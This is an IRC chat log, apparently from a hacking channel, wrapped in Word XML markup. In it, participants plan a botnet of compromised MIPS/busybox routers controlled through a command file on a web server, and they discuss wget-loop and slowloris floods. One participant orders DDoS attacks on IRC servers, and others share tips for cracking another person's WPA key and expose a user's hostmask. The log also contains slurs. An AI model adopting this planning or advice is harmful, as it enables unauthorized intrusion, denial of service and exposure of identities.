        <w:t>Jun 01 12:33:18 neuron about 15-20 :/ Jun 01 12:33:39 lol the other list i have is just as old as tht Jun 01 12:33:49 lol the problem is tht range is dynamic Jun 01 12:34:01 lol so it has to be re scanned regulary Jun 01 12:34:08 lol i got some good boxes to scan from Jun 01 12:34:16 lol ill just scan the range again Jun 01 12:34:18 neuron thats fine. Can you rescan the range?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:34:24 lol yeh :) Jun 01 12:34:38 lol ill set some screen sessions up scanning later tonight :) Jun 01 12:34:54 neuron cool once we have the bot in place it won't matter what ip there on :) there just going to pull a command from a webserver every now and then Jun 01 12:35:15 lol :) Jun 01 12:35:30 lol i just had a hard time getting anything i compile to execute on them Jun 01 12:35:39 lol evenn such simple mips asm Jun 01 12:35:57 neuron yeah thats why im going the bash route XD i couldn't get anything to run on them as well Jun 01 12:36:08 lol i was hoping to just cross compile a kaiten but it's not tht simple hahahahaa Jun 01 12:36:25 lol Unexpected ) error all the time Jun 01 12:37:22 lol now if we could remote update them, we could modify a firmware Jun 01 12:37:35 lol but i dont think thats possible Jun 01 12:37:41 neuron nope Jun 01 12:37:42 [redacted] keep it simple Jun 01 12:37:44 [redacted] write the bot in bash Jun 01 12:37:48 [redacted] using HTTP for CnC Jun 01 12:37:50 lol but people have modified them Jun 01 12:37:55 lol i found one with php on once Jun 01 12:38:22 lol some of them have aspx scripts on them Jun 01 12:38:35 lol they're really weird things Jun 01 12:38:43 neuron yeah but the aspx scripts only workfor local Jun 01 12:38:46 lol but they only have like 2MB memory Jun 01 12:38:48 neuron intranet Jun 01 12:38:53 neuron so there 192 address Jun 01 12:38:57 pwnsauce hey hey Jun 01 12:39:03 neuron o/ hey pwnsauce Jun 01 12:39:24 pwnsauce whats up?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:39:27 pwnsauce kaiten botting?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:39:32 pwnsauce * MIPS router bottinh?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:39:33 pwnsauce ok Jun 01 12:39:45 pwnsauce Kayla - I have some good code here Jun 01 12:39:48 pwnsauce a HTTP bot Jun 01 12:39:57 pwnsauce now what we can do is try cross compile that Jun 01 12:40:06 pwnsauce else, have a perl bot we can convert to BASH Jun 01 12:40:08 pwnsauce or ASH Jun 01 12:40:18 pwnsauce * a HTTP perl bot Jun 01 12:40:29 neuron yup Jun 01 12:40:31 neuron MIPS bottin Jun 01 12:40:39 pwnsauce Ive been researching it Jun 01 12:40:44 pwnsauce can they run shell scripts?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:40:46 neuron i was trying to find PSYBOT Jun 01 12:40:49 neuron pwnsauce: yeah Jun 01 12:40:51 pwnsauce ok Jun 01 12:40:58 pwnsauce onesec Jun 01 12:41:03 pwnsauce inb4linkage Jun 01 12:41:07 neuron lol Jun 01 12:41:13 neuron if you have a bot ill love you forever XD Jun 01 12:41:34 neuron if not im going to have to write a bash bot and i hate bash Jun 01 12:42:26 pwnsauce http://machinized.com/products.php Jun 01 12:42:29 pwnsauce look at Jun 01 12:42:32 pwnsauce "Hybrid" Jun 01 12:42:34 pwnsauce its Perl Jun 01 12:42:43 pwnsauce now I can try re writing some of it Jun 01 12:42:51 lol but we can't install perl on them xD Jun 01 12:43:00 pwnsauce kayla - i know Jun 01 12:43:05 pwnsauce but perl is closer to BASH Jun 01 12:43:07 pwnsauce than C Jun 01 12:43:08 pwnsauce :D Jun 01 12:43:13 * Neuron facepalm Jun 01 12:43:17 pwnsauce also QuadNX Jun 01 12:43:19 pwnsauce is in C Jun 01 12:43:29 neuron can't compile for them Jun 01 12:43:55 pwnsauce *thinks* Jun 01 12:43:58 pwnsauce brb 1 sec Jun 01 12:44:06 pwnsauce my brains not working right I think Jun 01 12:44:18 lol i think we're just going to have to work with whats already on them Jun 01 12:44:26 lol see i know people who said they've botted them Jun 01 12:44:30 lol but no ones proved it Jun 01 12:44:52 lol i think we're just going to have to make a loader for them Jun 01 12:45:07 lol now i remember you can load CISCO routers in to IRC using TELENT Jun 01 12:45:17 lol i wonder if the same can be done for these Jun 01 12:45:40 lol let me find it Jun 01 12:46:13 pwnsauce ok! I have found an IRC bot in BASH I think Jun 01 12:46:27 * Neuron_ (Neuron@HA-3hr.345.a84vd3.IP) has joined #pure- elite Jun 01 12:46:43 &lt;neuron_&gt; lol gonna be one of those days were my connection hates me Jun 01 12:47:00 pwnsauce http://linux.softpedia.com/get/Communications/Chat/BashBot-24097.shtml Jun 01 12:47:10 pwnsauce http://linux.softpedia.com/get/Programming/Libraries/TheBOT-25778.shtml Jun 01 12:47:49 pwnsauce now IDK if they are any use Jun 01 12:47:50 &lt;neuron_&gt; looking at it Jun 01 12:48:00 * Neuron has quit (Ping timeout: 121 seconds) Jun 01 12:48:08 &lt;neuron_&gt; don't think we want irc for this one Jun 01 12:48:16 pwnsauce aye, IRC was just an idea Jun 01 12:48:31 lol this is an old loader my friend wrote ages ago, it's for loading bots from a list of CISCO ip's http://pastebin.com/Y1E1QCgB Jun 01 12:48:52 lol we need something of the same effect Jun 01 12:49:50 &lt;neuron_&gt; http://pastebin.com/uqh4qEzJ Jun 01 12:49:57 &lt;neuron_&gt; this is the lame code im playing with right now Jun 01 12:50:16 &lt;neuron_&gt; i hate bash scripting because of its annoying tendencys so meh code sucks Jun 01 12:50:40 joepie92 http://www.thinq.co.uk/2011/6/1/nato-report- threatens-persecute-anonymous/ Jun 01 12:50:43 joepie92 we be terrorists nao guise Jun 01 12:50:56 &lt;neuron_&gt; were not anonymous :) Jun 01 12:52:01 pwnsauce brb :) ad Ill find Psyb0t src if I can Jun 01 12:52:23 lol "General Rapporteur Lord Jopling" Jun 01 12:52:28 &lt;neuron_&gt; lol gl if you can that would be amazing Jun 01 12:52:32 lol tht has to be a troll/hack ala tupac?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:52:36 lol tht name can't be real xD Jun 01 12:52:46 pwnsauce LOL kayla - didnt see that Jun 01 12:52:58 pwnsauce and Neuron_ if its out there its MINE now Jun 01 12:52:59 pwnsauce brbz Jun 01 12:53:03 lol Rapporteur Jopling xD wtf Jun 01 12:53:06 &lt;neuron_&gt; X Jun 01 12:53:07 &lt;neuron_&gt; d Jun 01 13:04:19 &lt;neuron_&gt; hmm linux dosen't allow multiple ping process's :/ Jun 01 13:04:59 sabu wtf you taking about lo Jun 01 13:05:01 sabu yes it does Jun 01 13:05:16 &lt;neuron_&gt; ping the same host with x amoutn of ping process? Jun 01 13:05:30 sabu ping google.com &amp; Jun 01 13:05:33 &lt;neuron_&gt; so ping google.com -c 10&amp; &lt;&lt; calling that 30 times Jun 01 13:05:34 sabu ping google.com &amp; Jun 01 13:05:37 sabu yes Jun 01 13:05:41 sabu you can do that all day Jun 01 13:05:42 &lt;neuron_&gt; results in one ping process using htop Jun 01 13:05:58 &lt;neuron_&gt; *im using htop to view running process* Jun 01 13:06:26 &lt;neuron_&gt; wait &lt;.&lt; derp Jun 01 13:07:46 &lt;neuron_&gt; my for loop using 'seq 30' wasn't working Jun 01 13:11:39 storm hii Jun 01 13:11:44 &lt;neuron_&gt; o/ storm Jun 01 13:12:34 storm .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:15:29 sabu storm Jun 01 13:15:47 * Neuron_ has quit (Connection closed) Jun 01 13:16:08 * Neuron (Neuron@HA-3hr.345.a84vd3.IP) has joined #pure- elite Jun 01 13:19:38 pwnsauce Neuron - got something inteeresting http://www.woodmann.com/forum/archive/index.php/t-12678.html Jun 01 13:19:41 storm yes sabu?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:19:48 pwnsauce its got a lnk to a bin Jun 01 13:19:56 neuron pwnsauce: tried both link :P nothing Jun 01 13:20:08 Topiary hey storm you wanna raep collective?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:20:11 neuron i couldn't even find a working binary of it :( Jun 01 13:22:05 storm yeah gimme a few Jun 01 13:22:39 joepie92 regex for matching TOC entries from RFCs Jun 01 13:22:40 joepie92 ([0-9]+\.)*[0-9]+[.]? [ .0-9]* Jun 01 13:22:52 joepie92 if someone happens to need it Jun 01 13:22:52 joepie92 :P Jun 01 13:24:05 storm just woke up Jun 01 13:24:14 Topiary heh Jun 01 13:24:25 sabu storm Jun 01 13:24:31 sabu get your boxes ready Jun 01 13:24:35 sabu I want you to hit them for a bit Jun 01 13:25:29 sabu you there niggy?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:27:25 * Neuron has quit (Ping timeout: 121 seconds) Jun 01 13:29:59 sabu storm hit their ircds again Jun 01 13:30:04 sabu take out collection Jun 01 13:30:05 sabu and madjack Jun 01 13:34:44 joepie92 - madjack.2600.net -------------------------------- - | Users: 104 (19.6%) Jun 01 13:34:44 joepie92 - '- blackbeard.2600.net -------------------------- | Users: 0 (0.0%) Jun 01 13:34:44 joepie92 - |- collective.2600.net ---------------------- | Users: 252 (47.5%) Jun 01 13:34:44 joepie92 - |- djslocker.2600.net ----------------------- | Users: 166 (31.3%) Jun 01 13:34:44 joepie92 - '- services.2600.net ------------------------ | Users: 9 (1.7%) Jun 01 13:37:04 * Neuron (Neuron@HA-s9t.345.a84vd3.IP) has joined #pure- elite Jun 01 13:37:08 neuron back Jun 01 13:37:09 neuron o/ Jun 01 13:37:14 sabu jea Jun 01 13:38:03 pwnsauce Neuron - hows it allw orking out?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:38:06 pwnsauce Im thinking here Jun 01 13:38:09 pwnsauce have SOME ideas Jun 01 13:38:15 pwnsauce ok Jun 01 13:38:57 neuron pwnsauce: we dont have alot to work with.. We can telnet,ssh,ping,wget &lt;&lt; from the busybox's Jun 01 13:39:17 neuron and i just tried to put my current work on the busybox and errors so yay \o/ Jun 01 13:44:41 pwnsauce ok, we can do those Jun 01 13:44:43 pwnsauce perhaps Jun 01 13:44:45 pwnsauce IDEA Jun 01 13:44:50 pwnsauce wgetraeping Jun 01 13:45:07 pwnsauce wget and pipe putput to /dev/null (or equivaent) Jun 01 13:45:22 pwnsauce have that in a loop Jun 01 13:45:34 pwnsauce so it just... keeps on wgetting Jun 01 13:45:40 pwnsauce hmmm one sec brb had idea Jun 01 13:45:52 sabu you can technically do slowloris attacks with wget Jun 01 13:46:51 neuron pwnsauce: yeah we were thinking about that. the trick is just to get a simple cnc type system going Jun 01 13:48:57 neuron im fighting with a bad subsitution error right on the busybox side. On my side works fine so few moments Jun 01 13:51:53 pwnsauce ah ok Jun 01 13:52:01 pwnsauce what C&amp;C we looking at?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:54:34 neuron just a simple webserver style one Jun 01 13:54:45 neuron script pulls down a "command.txt" and parses it for commands Jun 01 13:54:56 pwnsauce aaah :) Jun 01 13:55:05 pwnsauce and then you "Update" command.txt Jun 01 13:55:10 neuron yup Jun 01 13:55:11 pwnsauce via a web interface?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:55:21 neuron not a web interface but im sure we could do that Jun 01 13:55:29 pwnsauce I have something here Jun 01 13:55:31 neuron right now its just getting teh bash script to work on busybox Jun 01 13:55:43 storm hey pwnsauce Jun 01 13:55:44 storm :] Jun 01 13:55:46 pwnsauce a remote admin tool that uses th same mechanism - updates a command.txt file Jun 01 13:55:49 pwnsauce hey Storm :D Jun 01 13:55:54 storm suppie Jun 01 13:56:05 pwnsauce nm, working on some stuff Jun 01 13:56:14 pwnsauce my *nix partition nuked tho :/ Jun 01 13:56:28 storm yuck Jun 01 13:58:37 * Sabu gives channel operator status to Neuron Topiary voodoo pwnsauce Jun 01 13:58:37 * Sabu gives channel operator status to lol Jun 01 13:58:39 sabu thanks stor Jun 01 13:58:58 storm :p Jun 01 13:59:08 storm whatcha thanking me for Jun 01 13:59:11 storm seeing pings yet?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 13:59:59 neuron sigh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14:00:04 neuron ./bot.sh: 60: [[: not found Jun 01 14:00:10 neuron line 60 = done Jun 01 14:05:58 [redacted] back Jun 01 14:07:06 * also-cocks (pwnsauce@HA-q1a.9e1.pn6gun.IP) has joined #pure-elite Jun 01 14:07:43 * pwnsauce has quit (Ping timeout: 121 seconds) Jun 01 14:07:50 * also-cocks is now known as pwnsauce Jun 01 14:07:56 * Neuron has quit (Connection closed) Jun 01 14:08:18 * Neuron (Neuron@HA-s9t.345.a84vd3.IP) has joined #pure- elite Jun 01 14:08:42 pwnsauce my connection wernt Jun 01 14:10:08 * Neuron has quit (Quit: leaving) Jun 01 14:17:53 [redacted] do all of these little bastards Jun 01 14:17:57 [redacted] have a web directory?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:28:00 pwnsauce [redacted] - I dont knw... IIRC they have a web control interface of some kind Jun 01 14:28:28 pwnsauce Recursion! CANHAS SONYLULZ NAO PL0X!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:28:36 pwnsauce PM MEDIAFUCK LINKAGE!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:29:14 [redacted] then its simple Jun 01 14:29:17 [redacted] we write the bot in ASP Jun 01 14:29:18 [redacted] ???</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:29:19 [redacted] profit Jun 01 14:32:36 joepie92 what's the quickest way to crack a WPA-PSK key Jun 01 14:32:46 joepie92 or otherwise get access to a router using WPA-PSK Jun 01 14:32:46 joepie92 ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:32:53 * joepie92 never does that shit Jun 01 14:32:56 * trollpoll (trollpoll@HA-00r.11n.cc0br2.IP) has joined #pure-elite Jun 01 14:33:04 joepie92 ohai trollpoll Jun 01 14:33:08 * joepie92 repeats question Jun 01 14:33:12 trollpoll hi!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:33:12 joepie92 joepie92what's the quickest way to crack a WPA-PSK key Jun 01 14:33:12 joepie92 joepie92or otherwise get access to a router using WPA-PSK Jun 01 14:33:32 trollpoll hm, rainbow tables?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:34:25 joepie92 idk Jun 01 14:34:31 joepie92 I have absolutely no experience with shit like this Jun 01 14:34:36 joepie92 also, the guy who is asking has 18kbps internet Jun 01 14:34:39 trollpoll but, if is this kind of routers pre-configured with WPA key obtained automatically using MAC &amp; ESSID Jun 01 14:34:41 joepie92 so rainbow tables might not be the best idea... Jun 01 14:34:44 trollpoll could be easy...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:34:50 joepie92 ah Jun 01 14:34:50 trollpoll what kind of essid is it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:34:51 joepie92 thomsons Jun 01 14:34:53 joepie92 1 sec Jun 01 14:35:06 trollpoll in spain the jazztel_XXXX are quickly crackeable Jun 01 14:35:11 trollpoll and WLAN_XX too Jun 01 14:35:15 trollpoll and WLAN_XXXX too Jun 01 14:35:20 joepie92 let me ask Jun 01 14:35:53 trollpoll all of them are calculable having the mac and the essid, but if the user has already changed the wpa... it could be very hard to crack Jun 01 14:36:13 pwnsauce hmmmmm Jun 01 14:36:19 pwnsauce capture the handshake Jun 01 14:36:20 trollpoll anyway, i've tried to crack an wpa twice, and without good results...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:36:27 pwnsauce upload to online cracker service Jun 01 14:36:41 trollpoll use gerix, is a very good tool to do so Jun 01 14:36:42 joepie92 pwnsauce: got a link to a cracking service? Jun 01 14:37:12 joepie92 Huawei_HG521 Jun 01 14:37:18 joepie92 is the name Jun 01 14:37:19 trollpoll hur...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:37:29 trollpoll so it looks like a preconfigured name...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:37:33 trollpoll lets see...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:38:47 trollpoll hmm, hg521 is the model of the router Jun 01 14:39:11 joepie92 ah Jun 01 14:39:14 joepie92 :/ Jun 01 14:40:37 trollpoll i think that penetrate is an android tool to do this... (calculate the default wpa of some routers) Jun 01 14:41:10 pwnsauce joepie92 - ill find one Jun 01 14:41:17 trollpoll http://underdev.org/penetrate/ Jun 01 14:41:17 pwnsauce and I have penetrate but cant make it work Jun 01 14:41:39 trollpoll the thomson is calculable...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:41:53 trollpoll SpeedTouch, Thomson, Orange, DMax, BBox, Infinitum, Otenet, Cyta Jun 01 14:42:11 trollpoll do u have an android? :P Jun 01 14:42:24 pwnsauce I has...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:42:45 joepie92 I don't Jun 01 14:42:46 joepie92 lol Jun 01 14:43:28 trollpoll (i do have one too)...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:43:42 trollpoll do you use tor (orbot) for android pwnsauce ? Jun 01 14:43:48 trollpoll is better than expected...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:50:24 joepie92 hey Jun 01 14:50:24 joepie92 guys Jun 01 14:50:27 joepie92 if anyone is interested Jun 01 14:50:31 joepie92 in the nonynews guy Jun 01 14:50:35 joepie92 who was posting shit on wikia Jun 01 14:50:35 joepie92 - Whois list of nonyNews Jun 01 14:50:35 joepie92 - Realname: nonyNews Jun 01 14:50:35 joepie92 - Hostmask: nonyNews!~anon@server106963.santrex.net * Jun 01 14:50:35 joepie92 - nonyNews is on: #lulzsec Jun 01 14:50:35 joepie92 - Server: collective.2600.net (Arghhh, Scourge of the seven seas!) Jun 01 14:50:35 joepie92 - End of /WHOIS list.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:50:40 joepie92 :&gt; Jun 01 14:50:47 joepie92 @ Topiary Jun 01 14:51:10 Topiary indeed Jun 01 14:51:28 joepie92 fucking idiots not realizing your shit doesn't get masked on 2600...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:51:35 * joepie92 does anonops ip match Jun 01 14:51:57 pwnsauce trollpoll - I dont use my android to access web Jun 01 14:52:13 pwnsauce I only use to breal WEP key on Eircom Jun 01 14:52:18 Topiary joepie92, can I make them realize we have all their IPs? Jun 01 14:52:30 joepie92 mmmm Jun 01 14:52:33 joepie92 let me see the userlist first Jun 01 14:52:38 joepie92 to see if I recognize any fishy names Jun 01 14:54:39 joepie92 oops :3 Jun 01 14:54:54 Topiary you started it|!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:54:57 Topiary heh Jun 01 14:56:03 joepie92 meh Jun 01 14:56:10 joepie92 I was feeling a bit juvenile Jun 01 14:56:11 joepie92 :D Jun 01 14:57:38 joepie92 &lt;awinee&gt;joepie91 has more skill then you Jun 01 14:57:39 joepie92 lold Jun 01 14:57:40 joepie92 lold hard Jun 01 14:58:04 joepie92 because whoising someone Jun 01 14:58:06 joepie92 is in any way a skill Jun 01 14:58:06 joepie92 lol Jun 01 14:59:19 joepie92 &lt;thejackal&gt;holy shit this asshole never shuts up Jun 01 14:59:20 joepie92 &lt;thejackal&gt;it was bad enough seeing the trash you spill on twitter Awinee, now you come here?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 14:59:21 joepie92 lolol Jun 01 14:59:55 trollpoll where are you? at 2600?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15:00:09 joepie92 ya Jun 01 15:00:10 joepie92 lol Jun 01 15:00:20 trollpoll just trolling? or doing something?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:01:01 joepie92 GOD Jun 01 15:01:02 joepie92 I FUCKING HATE Jun 01 15:01:03 joepie92 THESE Jun 01 15:01:06 joepie92 WIBYA TOOLBARS Jun 01 15:01:11 joepie92 seriously Jun 01 15:01:14 joepie92 I try to read a blog Jun 01 15:01:16 joepie92 and I get 23512351235 popups Jun 01 15:01:17 joepie92 saying Jun 01 15:01:20 joepie92 you can tweet this Jun 01 15:01:22 joepie92 you can FB like this Jun 01 15:01:23 joepie92 you can blah Jun 01 15:01:24 joepie92 you can derp Jun 01 15:01:26 joepie92 you can herp Jun 01 15:01:29 joepie92 click here to this Jun 01 15:01:31 joepie92 click there to that Jun 01 15:01:40 joepie92 and I'm like gtfo with that toolbar shit, I just want to read the fucking article Jun 01 15:03:44 joepie92 example Jun 01 15:03:44 joepie92 http://draugnavz.repofter.com/blog/ Jun 01 15:14:08 joepie92 http://buypoe.com/technology/12837-fox-news-hacked- anonymous.html Jun 01 15:14:09 joepie92 wat.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 15:16:45 trollpoll where is this video??</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
